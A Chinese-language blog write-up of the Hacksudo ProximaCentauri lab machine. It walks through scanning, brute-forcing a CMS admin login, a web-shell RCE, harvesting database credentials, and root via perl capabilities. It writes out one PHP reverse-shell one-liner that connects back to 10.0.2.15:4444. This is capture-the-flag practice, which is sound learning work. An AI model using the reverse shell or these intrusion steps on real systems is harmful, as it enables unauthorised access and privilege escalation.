vulhub Hacksudo ProximaCentauri

不懂为啥有些操作不能复现,只好抄抄wp,跳过了

0x01

打开虚拟机可以看到ip


然后扫一下端口

0x02

开了80,去看看。
发现是有漏洞的cms,可以直接去github的issue看
关键就是登录后台了。一开始是用爆破工具。(理论上能出,因为密码在那个字典里,不过字典有1000+w,就不等了,看wp)
说是ssh可以有提示


wtf,说好的提示呢。
不管了,算是爆破出密码了。直接登录admin
然后网上能找到这个cms的rce脚本
然后干

然后打开那个shell.phar链接就直接rce

然后就不懂在哪里进行信息收集了。看看wp

/etc/passwd里面有mysql,去/var里面找找有没有mysql的数据

本来想干脆点直接看passwd的,结果没权限。而且这个bak cat没有回显,原来是要下载

内容

找到数据库用户和密码。该死的那个rce没有mysql的回显,所以要反弹shell
在p0wny那里运行php -r '$sock=fsockopen("10.0.2.15",4444);exec("bash <&3 >&3 2>&3");'
但是不懂为啥,本地明明ping的通,却无法反弹shell。
不管了,就算是拿到用户名密码了

然后ssh。由于物理机无法ssh到,所以直接在虚拟机登录了

0x03

拿到第一个flag


然后想办法提权。找suid文件

没发现可利用点。本来想来个sudo -l结果说没有sudo这个指令。
只是盲区,看看wp
linux setcap/getcap

原来可以用getcap

找到一个perl。然后进到目录,进行修改uid操作
参考:https://gtfobins.github.io/gtfobins/perl/#capabilities

在root下拿到第二个flag

有点尴尬,有几步复现不了,还是太菜了。。。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇